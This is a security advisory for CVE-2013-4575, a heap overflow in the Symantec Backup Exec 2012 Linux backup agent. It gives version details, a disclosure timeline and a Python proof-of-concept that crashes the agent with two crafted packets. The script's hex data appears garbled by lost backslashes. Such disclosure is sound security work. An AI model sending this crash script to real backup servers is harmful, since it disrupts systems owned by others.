Summary
Name: Symantec Backup Exec 2012 – Linux Backup Agent Heap Overflow
Release Date: 10 August 2012
Reference: NGS00342
Discoverer: Perran Hill
Vendor: Symantec
CVE Reference: CVE-2013-4575
Systems Affected: Symantec Backup Exec 2012
Risk: High
Status: Released
TimeLine
Discovered: 13 July 2012
Released: 13 July 2012
Approved: 13 July 2012
Reported: 13 July 2012
Fixed: 1 August 2013
Published: 30 September 2013
Description
Symantec Backup Exec 2012 – Linux Backup Agent Heap Overflow
I. VULNERABILITY
The Symantec Backup Exec 2012 Utility program which ships with a
MAC/Unix/Linux Agent that is vulnerable to a heap overflow
(tested on debian 6.0.4 Centos 6.2). By sending two crafted packets it is
possible to cause the client to terminate with a heap corruption.
II. Background
Symantec Backup Exec 2012 is an enterprise-level backup solution. The
affected version of the Agent has the following details:
#/var/VRTSralus/ralus.ver
ralus=1798.17
mdm=MDM_v0.0.6149
vxms=VxMS_4.4_038a
III. Description
The Agent can be found in the SYMANTEC install iso in
/media/SYMANTEC/LinuxUnixMac/RALUS_RMALS_RAMS-1798.17.tar.gz. Its used to
back up remote linux agents.
Technical Details
Tested/discovered on debian 6.0.4 and verified on Centos 6.2 [2.6.32-220.el6.x86_64]
#uname -a Linux monza3 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686 GNU/Linux
The PoC script below crashes both installations:
#!/usr/local/bin/python
import sys
from socket import *
import os
if (len(sys.argv)!=3):
print “n———————————–“
print “Usage: PoC
print “———————————–n”
exit(0)
host=sys.argv[1]
port=int(sys.argv[2])
data = bytearray(“x80x00x08x50x00x00x00x08x4fxf5xafxb7x00x00x00x00x00x00xf3
x83x00x00x00x00x00x00x00x00x00x00x00x03x00x00x00x0ex57x49x4ex32x4bx33x2d
x52x32x2dx45x4ex54x00x00x00x00x00x00x0ex77x69x6ex32x6bx33x2dx72x32x2dx65
x6ex74x00x00x00x00x00x00x10x31x39x32x2ex31x36x38x2ex32x34x35x2ex31x36x35
x00x2dx92xcbxcex2dx92xcbxcex00x00x00x00x00x00x00x00x00x00x04x2ax00x00x04
x2ax2dx2dx2dx2dx2dx42x45x47x49x4ex20x43x45x52x54x49x46x49x43x41x54x45x2d
x2dx2dx2dx2dx0ax4dx49x49x43x35x7ax43x43x41x6cx43x67x41x77x49x42x41x67x49
x52x41x50x51x4cx41x62x67x42x55x32x35x5ax76x53x30x31x50x5ax4ex50x66x34x77
x77x44x51x59x4ax4bx6fx5ax49x68x76x63x4ex41x51x45x46x42x51x41x77x0ax67x59
x45x78x43x7ax41x4ax42x67x4ex56x42x41x59x54x41x6cx56x54x4dx52x41x77x44x67
x59x44x56x51x51x49x45x77x64x47x62x47x39x79x61x57x52x68x4dx52x45x77x44x77
x59x44x56x51x51x48x45x77x68x49x5ax57x46x30x0ax61x48x4ax76x64x7ax45x64x4d
x42x73x47x41x31x55x45x43x68x4dx55x55x33x6cx74x59x57x35x30x5ax57x4dx67x51
x32x39x79x63x47x39x79x59x58x52x70x62x32x34x78x44x7ax41x4ex42x67x4ex56x42
x41x73x54x42x6bx4ax46x0ax4cx55x68x53x54x7ax45x64x4dx42x73x47x41x31x55x45
x41x78x4dx55x56x30x6cx4fx4dx6bx73x7ax4cx56x49x79x4cx55x56x4fx56x43x41x74
x49x46x4ax50x54x31x51x77x48x68x63x4ex4dx54x49x77x4ex6ax49x33x4dx54x51x77
x0ax4fx44x4dx32x57x68x63x4ex4dx54x4dx77x4ex7ax41x79x4dx54x51x77x4fx44x4d
x32x57x6ax43x42x67x54x45x4cx4dx41x6bx47x41x31x55x45x42x68x4dx43x56x56x4d
x78x45x44x41x4fx42x67x4ex56x42x41x67x54x42x30x5ax73x0ax62x33x4ax70x5ax47
x45x78x45x54x41x50x42x67x4ex56x42x41x63x54x43x45x68x6cx59x58x52x6fx63x6d
x39x33x4dx52x30x77x47x77x59x44x56x51x51x4bx45x78x52x54x65x57x31x68x62x6e
x52x6cx59x79x42x44x62x33x4ax77x0ax62x33x4ax68x64x47x6cx76x62x6ax45x50x4d
x41x30x47x41x31x55x45x43x78x4dx47x51x6bx55x74x53x46x4ax50x4dx52x30x77x47
x77x59x44x56x51x51x44x45x78x52x58x53x55x34x79x53x7ax4dx74x55x6ax49x74x52
x55x35x55x0ax49x43x30x67x55x6bx39x50x56x44x43x42x6ex7ax41x4ex42x67x6bx71
x68x6bx69x47x39x77x30x42x41x51x45x46x41x41x4fx42x6ax51x41x77x67x59x6bx43
x67x59x45x41x7ax34x30x34x67x68x42x77x64x58x66x4ax63x42x70x50x0ax51x41x2f
x61x2fx78x52x55x34x77x70x33x68x79x37x53x79x78x34x44x52x33x30x6ex6fx79x6d
x44x4fx47x58x69x6ax58x42x64x44x64x55x34x31x31x6ex43x70x64x53x2bx49x4ax63
x50x63x38x78x69x64x65x4ex74x69x6cx70x62x0ax79x4fx6fx45x70x75x61x51x6bx59
x39x70x6cx73x33x39x32x73x6fx53x49x4bx4dx4ex47x57x69x6ex43x45x41x66x71x4b
x71x48x54x34x38x2bx69x67x35x4fx41x76x69x74x4cx51x39x56x69x72x34x65x44x30
x65x6fx63x6dx6ex78x0ax36x44x77x59x57x41x61x70x75x4ax41x61x6cx70x61x33x58
x6ex6cx68x66x30x53x41x56x4dx55x43x41x77x45x41x41x61x4ex64x4dx46x73x77x44
x41x59x44x56x52x30x54x42x41x55x77x41x77x45x42x2fx7ax41x64x42x67x4ex56x0a
x48x51x34x45x46x67x51x55x69x65x54x37x39x44x47x72x34x54x33x52x74x35x73x6f
x58x78x45x47x61x78x4ex49x51x2bx59x77x48x77x59x44x56x52x30x6ax42x42x67x77
x46x6fx41x55x69x65x54x37x39x44x47x72x34x54x33x52x0ax74x35x73x6fx58x78x45
x47x61x78x4ex49x51x2bx59x77x43x77x59x44x56x52x30x50x42x41x51x44x41x67x48
x6dx4dx41x30x47x43x53x71x47x53x49x62x33x44x51x45x42x42x51x55x41x41x34x47
x42x41x42x67x35x74x6cx30x2bx0ax73x4dx73x66x4ax33x5ax47x34x69x4cx44x46x39
x39x46x46x54x33x4bx74x35x53x2fx62x33x30x2fx4cx72x53x2bx47x6ax46x6bx46x57
x48x52x31x4bx4ax79x2fx58x4dx30x33x59x6ex78x56x44x2fx52x30x30x32x35x64x2f
x35x78x0ax2bx48x52x52x61x4ax55x79x32x73x62x2bx6fx56x68x4ax46x64x77x65x6f
x44x4cx72x52x47x66x79x4cx6ex6fx41x33x63x78x71x35x37x41x35x34x62x35x54x78
x68x47x4bx66x35x62x61x48x70x2bx69x69x58x44x30x33x38x4cx6ex0ax33x6bx67x64
x58x7ax6fx4cx51x49x73x53x7ax59x2fx41x77x50x51x70x61x36x6bx61x7ax54x4dx77
x62x52x68x57x46x33x43x72x0ax2dx2dx2dx2dx2dx45x4ex44x20x43x45x52x54x49x46
x49x43x41x54x45x2dx2dx2dx2dx2dx0ax00x00x00x00x03xa9x00x00x03xa9x2dx2dx2d
x2dx2dx42x45x47x49x4ex20x54x52x55x53x54x45x44x20x43x45x52x54x49x46x49x43
x41x54x45x2dx2dx2dx2dx2dx0ax4dx49x49x43x65x54x43x43x41x65x4bx67x41x77x49
x42x41x67x49x52x41x4ex44x31x63x6cx47x6cx74x6ex62x66x33x4ex4fx63x79x66x74
x61x72x2bx6fx77x44x51x59x4ax4bx6fx5ax49x68x76x63x4ex41x51x45x46x42x51x41
x77x0ax67x59x45x78x43x7ax41x4ax42x67x4ex56x42x41x59x54x41x6cx56x54x4dx52
x41x77x44x67x59x44x56x51x51x49x45x77x64x47x62x47x39x79x61x57x52x68x4dx52
x45x77x44x77x59x44x56x51x51x48x45x77x68x49x5ax57x46x30x0ax61x48x4ax76x64
x7ax45x64x4dx42x73x47x41x31x55x45x43x68x4dx55x55x33x6cx74x59x57x35x30x5a
x57x4dx67x51x32x39x79x63x47x39x79x59x58x52x70x62x32x34x78x44x7ax41x4ex42
x67x4ex56x42x41x73x54x42x6bx4ax46x0ax4cx55x68x53x54x7ax45x64x4dx42x73x47
x41x31x55x45x41x78x4dx55x56x30x6cx4fx4dx6bx73x7ax4cx56x49x79x4cx55x56x4f
x56″)data2 = bytearray(“x43x41x74x49x46x4ax50x54x31x51x77x48x68x63x4ex4dx54x49
x77x4ex6ax4dx77x4dx54x55x78x0ax4ex6ax41x32x57x68x63x4ex4dx54x4dx77x4ex7a
x41x79x4dx54x51x77x4fx44x41x32x57x6ax42x7ax4dx51x73x77x43x51x59x44x56x51
x51x47x45x77x4ax56x55x7ax45x51x4dx41x34x47x41x31x55x45x43x42x4dx48x52x6d
x78x76x0ax63x6dx6cx6bx59x54x45x52x4dx41x38x47x41x31x55x45x42x78x4dx49x53
x47x56x68x64x47x68x79x62x33x63x78x48x54x41x62x42x67x4ex56x42x41x6fx54x46
x46x4ex35x62x57x46x75x64x47x56x6ax49x45x4ex76x63x6ex42x76x0ax63x6dx46x30
x61x57x39x75x4dx51x38x77x44x51x59x44x56x51x51x4cx45x77x5ax43x52x53x31x49
x55x6bx38x78x44x7ax41x4ex42x67x4ex56x42x41x4dx54x42x6dx31x76x62x6ex70x68
x4dx7ax43x42x6ex7ax41x4ex42x67x6bx71x0ax68x6bx69x47x39x77x30x42x41x51x45
x46x41x41x4fx42x6ax51x41x77x67x59x6bx43x67x59x45x41x74x59x6cx4ex36x53x44
x41x55x63x50x6fx78x71x66x52x65x52x37x69x44x5ax52x4ex2fx56x33x31x32x59x78
x6ex59x78x6dx56x0ax74x6bx45x46x65x38x42x72x43x46x57x63x75x79x4fx51x59x4c
x44x33x70x55x73x2fx58x37x61x6ex76x55x54x38x35x59x32x57x78x44x34x6bx75x55
x6fx46x45x4ax35x49x78x32x2bx58x4bx69x31x6bx79x51x72x62x79x50x33x6ex0ax71
x63x72x58x6dx7ax36x47x54x30x47x55x7ax5ax74x39x35x49x32x39x55x56x69x42x6a
x4fx75x2fx7ax30x6fx4ax35x4dx69x70x53x59x6ax4dx44x48x73x55x44x42x68x70x7a
x31x33x68x34x4fx41x66x74x4ax67x6fx4ax47x61x34x0ax6bx64x6dx39x46x43x38x43
x41x77x45x41x41x54x41x4ex42x67x6bx71x68x6bx69x47x39x77x30x42x41x51x55x46
x41x41x4fx42x67x51x42x6dx34x36x30x53x42x6cx72x66x7ax73x42x39x66x36x5ax61
x58x52x61x35x72x74x57x4fx0ax5ax42x4dx6ex4ex45x78x4cx5ax69x6bx68x42x71x4a
x5ax36x42x49x57x65x67x35x33x6ex78x53x6bx59x4bx54x6dx54x6fx73x69x50x64x68
x59x6bx4fx6dx30x37x61x5ax34x2fx48x48x42x35x77x59x79x75x50x58x6ax46x4cx51
x52x0ax74x4cx6bx2bx6ex65x34x63x68x6cx32x45x43x42x30x59x50x52x50x37x31x38
x38x4ex6ex35x38x63x70x6dx52x65x45x72x33x58x57x73x6dx30x6cx7ax50x6bx54x30
x4ax46x48x4fx58x32x42x63x34x71x6ax2fx58x70x49x43x48x35x0ax70x49x79x41x62
x5ax48x33x54x71x62x79x50x45x5ax73x55x51x3dx3dx0ax2dx2dx2dx2dx2dx45x4ex44
x20x54x52x55x53x54x45x44x20x43x45x52x54x49x46x49x43x41x54x45x2dx2dx2dx2d
x2dx0ax00x00x00x00″)
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print “sending one”
s.send(data)
x = s.recv(1512)
print list(bytearray(x))
print x
print “sending two”
s.send(data2)
x = s.recv(1512)
print list(bytearray(x))
print x
s.close()
Fix Information
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory pvid=
security_advisory year= suid=20130801_00